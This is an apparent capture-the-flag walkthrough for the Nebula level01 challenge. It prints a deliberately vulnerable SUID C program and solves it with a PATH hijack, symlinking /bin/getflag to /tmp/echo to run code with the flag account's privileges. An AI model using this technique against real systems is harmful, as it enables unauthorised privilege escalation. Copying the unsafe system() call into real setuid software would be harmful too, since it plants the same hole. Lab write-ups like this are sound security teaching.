Image of Nebula Terminal

There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it? To do this level, log in as the level01 account with the password level01. Files for this level can be found in /home/flag01.

Source code


#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
  gid_t gid;
  uid_t uid;
  gid = getegid();
  uid = geteuid();

  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

  system("/usr/bin/env echo and now what?");
}

Solution

Straight after we connect we go to flag01 account folder.

level01@nebula:~$ cd /home/flag01/
level01@nebula:/home/flag01$ ls -al
total 13
drwxr-x--- 2 flag01 level01   92 Nov 20  2011 .
drwxr-xr-x 1 root   root      80 Aug 27  2012 ..
-rw-r--r-- 1 flag01 flag01   220 May 18  2011 .bash_logout
-rw-r--r-- 1 flag01 flag01  3353 May 18  2011 .bashrc
-rw-r--r-- 1 flag01 flag01   675 May 18  2011 .profile
-rwsr-x--- 1 flag01 level01 7322 Nov 20  2011 flag01
level01@nebula:/home/flag01$

Here we can observe the SUID vulnerable application called “flag01” with permission -rwsr-x—. Let’s execute it!

level01@nebula:/home/flag01$ ./flag01
and now what?

Perfect! Let’s observe something on this line:


system("/usr/bin/env echo and now what?");

As you can observe the above C instruction is calling for a system command, “echo”. Is echo really echo in linux? Yeahhh, until you change it (actually until you make a link between your command and your other command). Let’s finish this!

level01@nebula:/home/flag01$ PATH=/tmp:$PATH
level01@nebula:/home/flag01$ ln -s /bin/getflag /tmp/echo
level01@nebula:/home/flag01$ ./flag01
You have successfully executed getflag on a target account
level01@nebula:/home/flag01$

Fun? Here is the science behind my actions.

  • http://www.cis.syr.edu/~wedu/Teaching/CompSec/LectureNotes_New/Set_UID.pdf
  • http://collaboration.cmc.ec.gc.ca/science/rpn/biblio/ddj/Website/articles/SA/v10/i06/a1.htm